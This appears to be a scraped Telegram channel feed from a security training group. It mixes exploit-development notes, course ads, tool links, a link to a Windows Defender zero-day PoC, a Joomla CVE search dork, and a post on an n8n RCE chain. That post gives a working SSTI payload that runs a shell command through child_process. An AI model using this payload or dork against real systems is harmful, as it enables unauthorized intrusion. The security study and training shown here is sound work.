Brut Security
15.6K subscribers
1.02K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
πŸ•ΈοΈπ—’π—¦π—˜π—— π—‘π—Όπ˜π—²π˜€:
(π—’π—³π—³π—²π—»π˜€π—Άπ˜ƒπ—² π—¦π—²π—°π˜‚π—Ώπ—Άπ˜π˜† π—˜π˜…π—½π—Ήπ—Όπ—Άπ˜ π——π—²π˜ƒπ—²π—Ήπ—Όπ—½π—²π—Ώ)

πŸ“‹List:

β€’x86 Intel Assembly
β€’Portable Executable File Format
β€’WinDBG
β€’WinDbg Automation with Python
β€’IDA
β€’Stack Overflows
β€’SEH Overflows
β€’EggHunters
β€’Reverse Engineering For Bugs
β€’DEP Bypass
β€’ASLR Bypass
β€’Format Strings Vulnerabilities
β€’Practicing

Link πŸ”—:-
https://zeyadazima.com/notes/osednotes/

πŸ”–#infosec #cybersecurity #hacking #pentesting #security
1πŸ”₯17❀5πŸ‘2
πŸ‘‰πŸ‘‰πŸ‘‰πŸ‘‰Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
❀9
πŸ”₯ BlueHammer β€” Windows Defender 0-Day Privilege Escalation PoC
βš”οΈ Unpatched Windows Zero-Day Exploit (SYSTEM Access)

πŸ“Œ GitHub Repository
πŸ‘‰ https://github.com/Nightmare-Eclipse/BlueHammer
❀7πŸ‘1
Brut Security
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
New Contents will be added every month without any extra cost
πŸ”΄ LIVE CLASS ALERT β€” Don't scroll past this.

πŸ’» Brut Security is launching a Practical Web Pentesting Live Class β€” and seats are limited.

πŸ—“οΈ Starts: May 4
🎯 Mode: Online (Live)

──────────────────
πŸ› οΈ What you'll learn:
β€’ SQL Injection, XSS, IDOR, SSRF
β€’ Authentication & Access Control Bypass
β€’ CSRF, File Upload Attacks
β€’ Burp Suite from scratch
β€’ Recon, API Hacking & Reporting
──────────────────

This isn't a pre-recorded course. This is LIVE β€” ask questions, break things in real time, and learn the way actual pentesters do.

βœ… Beginner friendly
βœ… Hands-on labs
βœ… Certificate on completion

πŸ”— Enroll now β†’ http://wa.link/brutsecurity

⚑ Spots fill fast. Don't wait.

#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
❀4
🚨 CVE-2026-23898 & CVE-2026-23899: Critical File Deletion and Webservice Flaws Exposed in Joomla.
πŸ‘‡Dorks
HUNTER : http://product.name="Joomla"
❀4
🚨 Bug Bounty Recon Methodology πŸ” 🐞
Link: https://github.com/Maniesh-Neupane/BugBounty-Recon-Methodology
Please open Telegram to view this post
VIEW IN TELEGRAM
❀11
What content/information you're looking for do let me know in comments below. I will try as much possible to share πŸ‘‰
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘3
πŸš€ Summer Batch Announcement – For Students Only

This summer, I’m starting a 1-month live training program focused on:

β€’ Ethical Hacking
β€’ Bug Bounty Hunting
β€’ Web Penetration Testing

πŸŽ“ Students only (Student ID mandatory for enrollment)

πŸ’» Live Classes
πŸ“… Duration: 1 Month
πŸ“œ Certificate included (Ethical Hacking + Web Pentesting)

πŸ’° Price:
β‚Ή4999 (India)
$89 (International)

πŸ“© DM to enroll or get details.
🀨3❀2
🚨 *APIStrike is live!* β€” API Security Scanner by RevoltSecurities

Automate your API pentesting. Point it at an OpenAPI spec, it handles the rest.

*What hits:*
⚑ OWASP API Top 10 coverage
🎯 DAST fuzzing β€” SQLi, XSS, SSRF, SSTI, CMDi & more
πŸ” Auth-aware β€” JWT, Basic, API key, Cookie bypass
πŸ”„ CI/CD gate β€” blocks deploys on critical findings
https://github.com/RevoltSecurities/apistrike
⭐ Star it. Share it. Break APIs legally.
❀5πŸ”₯4
πŸ‘‰πŸ‘‰πŸ‘‰πŸ‘‰Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!πŸ˜‹πŸ˜‹πŸ˜‹
Please open Telegram to view this post
VIEW IN TELEGRAM
2πŸ”₯10❀5
🚨One Liners for bug bounty

βœ… Download: https://github.com/0xPugal/One-Liners
πŸ”₯5❀1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)

The chain exploitation method is:
1. Allow User input
2. Render the user input on browser
3. SSTI exploitation e.g. {{7*7}}
4. SSTI to RCE payload e.g.
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id").toString()')()}}


If you guys are really enjoy to read, then show your love ❀️

#rce #ssti #n8n
❀17πŸ‘5
Happy Bengali New Year 1433 🌸

New year. New game.
No excuses this time , only execution.
Build yourself so strong that opportunities start chasing you.

β€” Brut Security πŸ”₯
❀5πŸ™1🀝1